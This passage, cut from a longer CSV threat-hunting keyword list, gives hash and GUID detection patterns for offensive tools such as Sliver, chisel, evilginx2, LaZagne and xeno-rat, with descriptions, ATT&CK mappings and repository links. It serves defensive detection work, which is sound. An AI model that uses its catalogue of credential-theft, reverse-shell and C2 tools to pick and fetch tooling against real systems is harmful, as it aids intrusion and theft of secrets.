- TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*516280565958*",".{0,1000}516280565958.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*516280565959*",".{0,1000}516280565959.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e*",".{0,1000}5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed*",".{0,1000}518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154*",".{0,1000}5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff*",".{0,1000}51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e*",".{0,1000}51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb*",".{0,1000}51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*51C6E016-1428-441D-82E9-BB0EB599BBC8*",".{0,1000}51C6E016\-1428\-441D\-82E9\-BB0EB599BBC8.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*51E46096-4A36-4C7D-9773-BC28DBDC4FC6*",".{0,1000}51E46096\-4A36\-4C7D\-9773\-BC28DBDC4FC6.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda*",".{0,1000}51ec632f44196675aac4e358940ac03d5a135a4d7dc150a5ee678203afec9fda.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334*",".{0,1000}51f92adcb4397e57d3809d3fa76bbf2cfb8ca772551b755ea8b0b3a6ba316334.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*52040049-D7FC-4C72-B6AE-BD2C7AB27DEE*",".{0,1000}52040049\-D7FC\-4C72\-B6AE\-BD2C7AB27DEE.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d*",".{0,1000}52083b583a80716b034b5ea9c98d0070091d63c2a13771afa42268cec2de7b1d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407*",".{0,1000}520f529151f419ccb0e75d9f9d2c9a24fb4809468dbd95360e4483672db46407.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a*",".{0,1000}52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce*",".{0,1000}52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*",".{0,1000}526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb*",".{0,1000}528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97*",".{0,1000}52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44*",".{0,1000}529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d*",".{0,1000}52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*52B0FF57-7E0A-4CA9-84D4-58DFA2456BA5*",".{0,1000}52B0FF57\-7E0A\-4CA9\-84D4\-58DFA2456BA5.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d*",".{0,1000}52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e*",".{0,1000}52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905*",".{0,1000}5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9*",".{0,1000}53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04*",".{0,1000}53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572*",".{0,1000}533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803*",".{0,1000}534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*534D9A24-3138-4209-A4C6-6B9C1EF0B579*",".{0,1000}534D9A24\-3138\-4209\-A4C6\-6B9C1EF0B579.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760*",".{0,1000}535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7*",".{0,1000}537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2*",".{0,1000}5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c*",".{0,1000}542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609*",".{0,1000}543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*5439CECD-3BB3-4807-B33F-E4C299B71CA2*",".{0,1000}5439CECD\-3BB3\-4807\-B33F\-E4C299B71CA2.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8*",".{0,1000}543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773*",".{0,1000}545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8*",".{0,1000}5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56*",".{0,1000}54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7*",".{0,1000}5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9*",".{0,1000}549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 